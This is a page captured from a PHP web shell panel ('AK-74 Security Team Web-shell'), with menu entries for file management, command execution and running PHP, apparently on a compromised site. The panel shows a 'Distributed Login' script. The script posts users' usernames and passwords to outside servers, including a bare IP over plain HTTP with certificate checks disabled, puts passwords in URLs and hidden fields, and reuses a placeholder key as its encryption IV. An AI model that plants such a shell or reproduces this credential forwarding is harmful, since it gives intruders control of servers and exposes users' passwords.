.:: :[ AK-74 Security Team Web-shell ]: ::.
General information
File manager
phpinfo()
Run PHP
Execute the command
Edit the file
<?php // Common key - must be the same across systems define('LOGIN_SECRET_KEY', 'your_super_secret_key'); // store securely! function encryptLoginData($data) { $payload = json_encode($data); return urlencode(base64_encode(openssl_encrypt($payload, 'aes-256-cbc', LOGIN_SECRET_KEY, 0, substr(LOGIN_SECRET_KEY, 0, 16)))); } function decryptLoginData($token) { $decoded = base64_decode(urldecode($token)); $decrypted = openssl_decrypt($decoded, 'aes-256-cbc', LOGIN_SECRET_KEY, 0, substr(LOGIN_SECRET_KEY, 0, 16)); return json_decode($decrypted, true); } if ($_SERVER['REQUEST_METHOD'] === 'POST') { $username = $_POST['username'] ?? ''; $password = $_POST['password'] ?? ''; $servers = [ [ "login_checker" => 'http://78.159.97.222/login_checker.php', "login_handler" => 'https://s1.henditech.com/login_handler.php' ], [ "login_checker" => 'http://s1.matech.com.sa/login_checker.php', "login_handler" => 'https://s1.matech.com.sa/login_handler.php' ], // Add more servers here ]; $rememberMe = isset($_POST['remember_me']) ? true : false; $validServers = []; $postFields = http_build_query([ 'username' => $username, 'password' => $password, 'cmd' => 'login', 'remember_me' => $rememberMe, 'mobile' => false ]); // cURL multi init $multiHandle = curl_multi_init(); $curlHandles = []; $errors = []; foreach ($servers as $index => $server) { $url = $server['login_checker']; $ch = curl_init($url); curl_setopt_array($ch, [ CURLOPT_RETURNTRANSFER => true, CURLOPT_POST => true, CURLOPT_POSTFIELDS => $postFields, CURLOPT_TIMEOUT => 10, CURLOPT_CONNECTTIMEOUT => 5, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_FAILONERROR => true ]); curl_multi_add_handle($multiHandle, $ch); $curlHandles[$index] = [ 'ch' => $ch, 'handler_url' => $server['login_handler'] ]; } // Execute all requests $running = null; do { $status = curl_multi_exec($multiHandle, $running); if ($status !== CURLM_OK) { error_log("cURL multi error: " . curl_multi_strerror($status)); break; } curl_multi_select($multiHandle); } while ($running > 0); foreach ($curlHandles as $index => $handle) { $ch = $handle['ch']; $handlerUrl = $handle['handler_url']; $checkerUrl = $servers[$index]['login_checker']; $error = curl_error($ch); if ($error) { $errors[$checkerUrl] = $error; error_log("cURL error for $checkerUrl: $error"); continue; } $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE); if ($httpCode !== 200) { $errors[$checkerUrl] = "HTTP status $httpCode"; error_log("HTTP error for $checkerUrl: $httpCode"); continue; } $response = curl_multi_getcontent($ch); $data = json_decode($response, true); if (json_last_error() !== JSON_ERROR_NONE) { $errors[$checkerUrl] = 'Invalid JSON response'; error_log("JSON decode error for $checkerUrl: " . json_last_error_msg()); continue; } if (!empty($data['success']) && $data['message'] === 'VALID') { $validServers[] = [ 'checker_url' => $checkerUrl, 'handler_url' => $handlerUrl ]; } else { $errors[$checkerUrl] = $data['message'] ?? 'Invalid response format'; } curl_multi_remove_handle($multiHandle, $ch); curl_close($ch); } curl_multi_close($multiHandle); /* // Output results and errors for debugging echo "<pre>"; echo "Valid servers: " . print_r($validServers, true) . "\n"; if (!empty($errors)) { var_dump($postFields); echo "Errors:\n"; foreach ($errors as $url => $error) { echo "- $url: $error\n"; } } echo "</pre>"; exit(); */ $token = encryptLoginData([ 'username' => $username, 'password' => $password, 'cmd' => 'login', 'remember_me' => $rememberMe, 'mobile' => false, 'timestamp' => time() ]); if (count($validServers) === 0) { echo "<script>alert('Invalid username or password.');window.history.back();</script>"; exit(); } elseif (count($validServers) === 1) { header("Location: {$validServers[0]['handler_url']}?token={$token}"); } else { // Multiple matches: let user pick one echo " <style> body { margin: 0; padding: 0; font-family: Arial, sans-serif; background-color: #f4f4f4; display: flex; justify-content: center; align-items: center; height: 100vh; } .container { background-color: #fff; padding: 30px 40px; border-radius: 10px; box-shadow: 0 0 15px rgba(0, 0, 0, 0.1); text-align: center; max-width: 400px; width: 100%; } h2 { margin-bottom: 20px; color: #333; } form { margin: 10px 0; } button { background-color: #007BFF; color: white; border: none; padding: 12px 20px; border-radius: 5px; cursor: pointer; font-size: 16px; transition: background-color 0.3s ease; width: 100%; } button:hover { background-color: #0056b3; } @media (max-width: 480px) { .container { padding: 20px; } button { font-size: 14px; padding: 10px 16px; } } </style> <div class='container'> <h2>Select a server to log in:</h2> "; foreach ($validServers as $server) { $domain = parse_url($server['handler_url'], PHP_URL_HOST); $safeUsername = htmlspecialchars($username, ENT_QUOTES); $safePassword = htmlspecialchars($password, ENT_QUOTES); $form = " <form method='POST' action='{$server['handler_url']}?token={$token}'> <input type='hidden' name='username' value='{$safeUsername}'> <input type='hidden' name='password' value='{$safePassword}'> <button type='submit'>Login to {$domain}</button> </form> "; echo $form; } echo "</div>"; exit(); } } ?> <!DOCTYPE html> <html> <head> <title>Distributed Login</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style> * { box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Helvetica, Arial, sans-serif; } body { margin: 0; padding: 20px; background-color: #f5f5f7; color: #333; line-height: 1.6; } .login-container { max-width: 400px; margin: 40px auto; padding: 25px; background: white; border-radius: 12px; box-shadow: 0 4px 12px rgba(0, 0, 0, 0.1); } h2 { margin-top: 0; color: #2c3e50; text-align: center; font-size: 24px; } .form-group { margin-bottom: 20px; } label { display: block; margin-bottom: 8px; font-weight: 500; color: #555; } input[type="text"], input[type="password"] { width: 100%; padding: 12px 15px; border: 1px solid #ddd; border-radius: 8px; font-size: 16px; transition: border-color 0.3s; } input[type="text"]:focus, input[type="password"]:focus { border-color: #3498db; outline: none; } .checkbox-group { display: flex; align-items: center; margin-bottom: 20px; } .checkbox-group input { margin-right: 10px; } button[type="submit"] { width: 100%; padding: 14px; background-color: #3498db; color: white; border: none; border-radius: 8px; font-size: 16px; font-weight: 500; cursor: pointer; transition: background-color 0.3s; } button[type="submit"]:hover { background-color: #2980b9; } .server-selection { margin-top: 30px; } .server-option { margin-bottom: 15px; } .server-option button { width: 100%; padding: 12px; background-color: #2ecc71; color: white; border: none; border-radius: 8px; font-size: 15px; cursor: pointer; transition: background-color 0.3s; } .server-option button:hover { background-color: #27ae60; } #loadingOverlay { display: none; position: fixed; top: 0; left: 0; width: 100vw; height: 100vh; background: rgba(0,0,0,0.4); z-index: 9999; justify-content: center; align-items: center; } .spinner { border: 5px solid rgba(255,255,255,0.3); border-radius: 50%; border-top: 5px solid #3498db; width: 50px; height: 50px; animation: spin 1s linear infinite; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } @media (max-width: 480px) { .login-container { margin: 20px auto; padding: 20px; } body { padding: 10px; } h2 { font-size: 20px; } input[type="text"], input[type="password"], button { padding: 12px; } } </style> </head> <body> <div class="login-container"> <h2>Login</h2> <form method="POST" onsubmit="showLoading()"> <div class="form-group"> <label for="username">Username</label> <input type="text" id="username" name="username" required placeholder="Enter your username"> </div> <div class="form-group"> <label for="password">Password</label> <input type="password" id="password" name="password" required placeholder="Enter your password"> </div> <div class="checkbox-group"> <input type="checkbox" id="remember_me" name="remember_me" value="1"> <label for="remember_me">Remember Me</label> </div> <button type="submit">Login</button> </form> </div> <!-- <div id="loadingOverlay"> <div class="spinner"></div> </div> --> <script> function showLoading() { document.getElementById('loadingOverlay').style.display = 'flex'; } // Auto-focus username field on page load document.addEventListener('DOMContentLoaded', function() { document.getElementById('username').focus(); }); </script> </body> </html>
Rename:
-